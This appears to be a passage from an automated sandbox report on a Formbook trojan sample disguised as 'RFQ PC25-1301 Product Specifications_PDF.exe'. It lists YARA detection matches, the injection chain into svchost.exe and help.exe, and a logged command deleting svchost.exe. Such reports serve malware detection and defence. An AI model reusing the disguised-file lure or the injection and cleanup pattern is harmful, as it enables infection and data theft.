          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0350B1B05_2_0350B1B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035070C05_2_035070C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035AF0CC5_2_035AF0CC
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035B70E95_2_035B70E9
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BF0E05_2_035BF0E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BF7B05_2_035BF7B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035456305_2_03545630
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035B16CC5_2_035B16CC
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035B75715_2_035B7571
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035C95C35_2_035C95C3
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0359D5B05_2_0359D5B0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034F14605_2_034F1460
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BF43F5_2_035BF43F
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BFB765_2_035BFB76
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03575BF05_2_03575BF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0353DBF95_2_0353DBF9
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0351FB805_2_0351FB80
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BFA495_2_035BFA49
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035B7A465_2_035B7A46
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03573A6C5_2_03573A6C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035ADAC65_2_035ADAC6
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03545AA05_2_03545AA0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0359DAAC5_2_0359DAAC
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035A1AA35_2_035A1AA3
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035099505_2_03509950
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0351B9505_2_0351B950
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035959105_2_03595910
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0356D8005_2_0356D800
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035038E05_2_035038E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BFF095_2_035BFF09
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034C3FD55_2_034C3FD5
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_034C3FD25_2_034C3FD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03501F925_2_03501F92
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BFFB15_2_035BFFB1
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03509EB05_2_03509EB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035B1D5A5_2_035B1D5A
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03503D405_2_03503D40
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035B7D735_2_035B7D73
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0351FDC05_2_0351FDC0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03579C325_2_03579C32
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_035BFCF25_2_035BFCF2
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CCE7A45_2_02CCE7A4
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CB9E5C5_2_02CB9E5C
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CB9E605_2_02CB9E60
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CB2FB05_2_02CB2FB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CB2D875_2_02CB2D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_02CB2D905_2_02CB2D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0326A0365_2_0326A036
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03265B325_2_03265B32
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03265B305_2_03265B30
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0326B2325_2_0326B232
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_032689125_2_03268912
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_032610825_2_03261082
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_03262D025_2_03262D02
          Source: C:\Windows\SysWOW64\help.exeCode function: 5_2_0326E5CD5_2_0326E5CD
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: String function: 00A49CB3 appears 31 times
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: String function: 00A60A30 appears 46 times
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: String function: 00A5F9F2 appears 40 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 36 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 268 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 96 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 105 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0356EA12 appears 86 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 03535130 appears 58 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0357F290 appears 105 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 03547E54 appears 111 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 034EB970 appears 280 times
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2332247044.0000000003AF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ PC25-1301 Product Specifications_PDF.exe
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, 00000000.00000003.2333254496.0000000003C9D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ PC25-1301 Product Specifications_PDF.exe
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4776081741.0000000008811000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: RFQ PC25-1301 Product Specifications_PDF.exe PID: 2940, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 6444, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
          Source: Process Memory Space: help.exe PID: 5132, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@12/5
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB37B5 GetLastError,FormatMessageW,0_2_00AB37B5
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AA10BF AdjustTokenPrivileges,CloseHandle,0_2_00AA10BF
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AA16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00AA16C3
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00AB51CD
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00ACA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00ACA67C
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00AB648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00AB648E
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeCode function: 0_2_00A442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00A442A2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeFile created: C:\Users\user\AppData\Local\Temp\juvenilelyJump to behavior
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: RFQ PC25-1301 Product Specifications_PDF.exeReversingLabs: Detection: 36%
          Source: unknownProcess created: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe"
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe "C:\Windows\SysWOW64\autoconv.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic file information: File size 1790464 > 1048576
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: RFQ PC25-1301 Product Specifications_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
